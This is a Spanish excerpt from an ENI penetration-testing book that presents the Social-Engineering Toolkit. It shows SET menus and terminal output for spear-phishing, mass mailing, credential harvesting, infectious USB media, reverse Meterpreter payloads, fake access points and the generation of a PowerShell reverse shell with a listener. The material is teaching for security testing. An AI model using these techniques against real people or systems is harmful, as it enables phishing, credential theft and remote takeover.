¡Acceso ilimitado 24/7 a todos nuestros libros y vídeos! Descubra la Biblioteca Online ENI. Pulse aquí
¡Acceso ilimitado 24/7 a todos nuestros libros y vídeos! Descubra la Biblioteca Online ENI. Pulse aquí
  1. Libros
  2. Metasploit
  3. SET
Extrait - Metasploit Verifique la seguridad de sus infraestructuras
Extractos del libro
Metasploit Verifique la seguridad de sus infraestructuras
1 opinión
Volver a la página de compra del libro

SET - Social-Engineering Toolkit

Presentación de Social-Engineering Toolkit

SET es un software desarrollado en Python que ofrece varias funciones para abusar de las técnicas de social engineering. La social engineering se refiere a las técnicas para manipular a los seres humanos.

root@kali:~# setoolkit  
  
     ..######..########.########  
     .##....##.##..........##...  
     .##.......##..........##...  
     ..######..######......##...  
     .......##.##..........##...  
     .##....##.##..........##...  
     ..######..########....##...  
  
[---]     The Social-Engineer Toolkit (SET)       [---]  
[---]     Created by: David Kennedy (ReL1K)       [---]  
                   Version: 7.7.9  
                Codename: 'Blackout'  
[---]     Follow us on Twitter: @TrustedSec       [---]  
[---]     Follow me on Twitter: @HackingDave      [---]  
[---]     Homepage: https://www.trustedsec.com   ...

Spear-Phishing Attack Vectors

La sección Spear-Phishing Attack Vectors permite realizar ataques de tipo spear-phishing. A diferencia de los ataques tradicionales de phishing, el spear-phishing se distingue por la personalización del mensaje gracias a la información obtenida previamente.

set> 1   
  
The Spearphishing module allows you to specially craft email  
messages and send them to a large (or small) number of people  
with attached fileformat malicious payloads. If you want to spoof  
your email address, be sure "Sendmail" is installed (apt-get  
install sendmail) and change the config/set_config SENDMAIL=OFF  
flag to SENDMAIL=ON.   
  
There are two options, one is getting your feet wet and letting  
SET do everything for you (option 1), the second is to create your own 
FileFormat payload and use it in your own attack. Either way, good 
luck and enjoy!   
  
  1) Perform a Mass Email Attack   
  2) Create a FileFormat Payload   
  3) Create a Social-Engineering Template   
  
 99) Return to Main Menu 

Website Attack Vectors

La sección Website Attack Vectors permite configurar un sitio web malicioso con el objetivo de explotar una vulnerabilidad en el navegador de la víctima, o jugar a la social engineering para que la víctima realice una acción que permita al atacante tomar el control de la máquina de forma remota:

set> 2   
  
  1) Java Applet Attack Method   
  2) Metasploit Browser Exploit Method   
  3) Credential Harvester Attack Method   
  4) Tabnabbing Attack Method   
  5) Web Jacking Attack Method   
  6) Multi-Attack Web Method   
  7) Full Screen Attack Method   
  8) HTA Attack Method   
  
 99) Return to Main Menu 

Dado que no podemos revisar todos los vectores de ataque, nos centraremos en los dos primeros utilizando el Framework Metasploit.

1. Java Applet Attack Method

Como su nombre indica, la sección Java Applet Attack Method permite no solo crear un applet Java malicioso, sino también clonar un sitio web para hacer que el ataque sea particularmente complejo de identificar:

1)Java Applet Attack Method   
2) Metasploit Browser Exploit Method   
3) Credential Harvester Attack Method   
4) Tabnabbing Attack Method   
5) Web Jacking Attack Method   
6) Multi-Attack Web Method   
7) Full Screen...

Infectious Media Generator

La sección Infectious Media Generator permite crear archivos autorun.inf para añadir a memorias USB o CD/DVD, así como una payload Metasploit. Una vez que se inserta la llave USB o el CD/DVD, el autorun ejecutará automáticamente la carga.

En Windows, los archivos autorun.inf ya no se ejecutan de forma automática ni silenciosa desde Windows Vista.

El parche KB971029 también permite limitar estas ejecuciones automáticas en Windows XP.

Create a Payload and Listener

La sección Create a Payload and Listener hace que sea relativamente fácil generar una payload y ejecutar un agente de escucha dentro de Metasploit.

Por ejemplo, se pueden usar las siguientes acciones para crear un archivo malintencionado que ejecute un reverse Meterpreter:

set> 4  
  
1) Windows Shell Reverse_TCP               Spawn a command shell on 
victim and send back to attacker   
2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell 
on victim and send back to attacker   
3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim 
and send back to attacker   
4) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, 
Reverse TCP Inline   
5) Windows Meterpreter Reverse_TCP X64     Connect back to the  
attacker (Windows x64), Meterpreter   
6) Windows Meterpreter Egress Buster       Spawn a meterpreter shell 
and find a port home via multiple ports   
7) Windows Meterpreter Reverse HTTPS       Tunnel communication over  
HTTP using SSL and use Meterpreter   
8) Windows Meterpreter Reverse DNS         Use a hostname instead of  
an IP address and use Reverse Meterpreter...

Mass Mailer Attack

Como su propio nombre indica, la sección Mass Mailer Attack permite hacer phishing masivo a una o más direcciones. Este módulo también permite insertar enlaces o archivos maliciosos dentro de los correos electrónicos enviados. 

set> 5   
  
  Social Engineer Toolkit Mass E-Mailer   
  
  There are two options on the mass e-mailer, the first would   
  be to send an email to one individual person. The second option   
  will allow you to import a list and send it to as many people as   
  you want within that list.   
  
  What do you want to do:   
  
    1.  E-Mail Attack Single Email Address   
    2.  E-Mail Attack Mass Mailer   
  
   99.  Return to main menu. 

Arduino-Based Attack Vector

La sección Arduino-Based Attack Vector permite transformar un Arduino para programarlo con el objetivo de realizar ataques físicos. Estos ataques físicos se basan en el hecho de que este tipo de dispositivo es capaz de fingir ser un ratón o el teclado y de esta manera eludir diversas medidas de protección. Esto generalmente se conoce como USB HID (dispositivo Human Interface DeviceAttack.

Wireless Access Point Attack Vector

La sección Wireless Access Point Attack Vector permite crear un punto de acceso Wi-Fi falso mediante la suite Aircrack-ng. De hecho, gracias a Airbase-ng, AirMon-ng, DNSSpoof y dhcp3, SET crea un punto de acceso y redirige todas las consultas DNS a la máquina del atacante. Entonces, simplemente será necesario redirigir a las víctimas a un ataque visto anteriormente.

QRCode Generator Attack Vector

Al igual que la sección Wireless Access Point Attack Vector, la sección QRCode Generator Attack Vector no permite realizar ataques. Sin embargo, generar un QRCode puede camuflar URL maliciosas:

set> 8   
The QRCode Attack Vector will create a QRCode for you with whatever 
URL you want.   
  
When you have the QRCode Generated, select an additional attack vector 
within SET and deploy the QRCode to your victim. For example, generate 
a QRCode of the SET Java Applet and send the QRCode via a mailer.   
  
Enter the URL you want the QRCode to go to (99 to exit):  
https://www.qr-code-generator.com/  
  
[*] QRCode has been generated under  
/root/.set/reports/qrcode_attack.png 

Una vez generado, lo único que falta es transmitir a un objetivo potencial el QRCode que apunta a una URL maliciosa:

images/cap15_pag11.png

Powershell Attack Vectors

Por último, la sección Powershell Attack Vectors permite crear código malintencionado en PowerShell para que se ejecute en un sistema de tipo Windows:

set> 9   
  
The Powershell Attack Vector module allows you to create PowerShell 
specific attacks. These attacks will allow you to use PowerShell which 
is available by default in all operating systems Windows Vista and 
above. PowerShell provides a fruitful landscape for deploying  
payloads and performing functions that do not get triggered  
by preventative technologies.   
  
  1) Powershell Alphanumeric Shellcode Injector   
  2) Powershell Reverse Shell   
  3) Powershell Bind Shell   
  4) Powershell Dump SAM Database   
  
 99) Return to Main Menu  
  
set:powershell>2   
Enter the IPAddress or DNS name for the reverse host: 192.168.171.152  
set:powershell> Enter the port for listener [443]: 443   
[*] Rewriting the powershell reverse shell with options   
[*] Exporting the powershell stuff to /root/.set/reports/powershell  
  
set> Do you want to start a listener [yes/no]: yes  
  
Listening on 0.0.0.0:443 

En este caso, el reverse shell en PowerShell se encuentra en el archivo /root/.set/reports/powershell/powershell.reverse.txt...